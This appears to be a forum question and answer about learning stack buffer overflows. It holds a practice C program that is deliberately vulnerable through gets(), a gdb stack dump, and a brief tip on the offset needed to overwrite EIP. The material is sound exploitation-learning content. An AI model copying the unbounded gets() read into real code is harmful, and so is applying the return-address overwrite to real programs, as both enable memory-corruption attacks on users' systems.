Having trouble with learning Buffer Overflows

Question

So I have this program in C that I'm trying to exploit which has a vulnerability in a function, namely it's using gets. I'm trying to overflow and change the return address so the program returns one or both of the two functions that are not called.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void half_win()
{
  printf("Well done, you got half the score\n");
}

void complete_win(){
  printf("FULL SCORE\n");
}
void vuln_func(){
  char buffer[36];
  gets(buffer);
  printf("You have entered: %s\n",buffer);
}

int main(int argc,char**argv){
  vuln_func();
}

So I overflow the buffer, I go to check the esp to calculate the offset by subtracting the address where the buffer starts from the esp's address but what's strange is that the buffer seems to overwrite the esp.

(gdb) x/24wx $esp
0xffffd0c8: 0x41414141  0x41414141  0x41414141  0xffffd100
0xffffd0d8: 0xffffd16c  0xffffd0f4  0x00000001  0xffffd164
0xffffd0e8: 0xf7fac000  0xf7fe574a  0xffffd160  0x00000000
0xffffd0f8: 0xf7fac000  0x00000000  0x00000000  0x98862ada
0xffffd108: 0xdada4cca  0x00000000  0x00000000  0x00000000
0xffffd118: 0x00000040  0xf7ffd024  0x00000000  0x00000000

So both their addresses are the same so the offset value is 0. I can't figure out what I'm doing wrong here. If any could give some guidance you'd be really saving me.

It's running on Ubuntu by the way.

Answer 1

This is a document I wrote, and will be presenting at BSides Tokyo tomorrow. Will probably help, since it looks like the same type of simple overflow. http://sysrisk.com/files/WhyBufferOverflowsMatter.pdf

Add 8 bytes and that should overwrite EIP. Peda tools should be added to GDB to make all that offset calculation easier.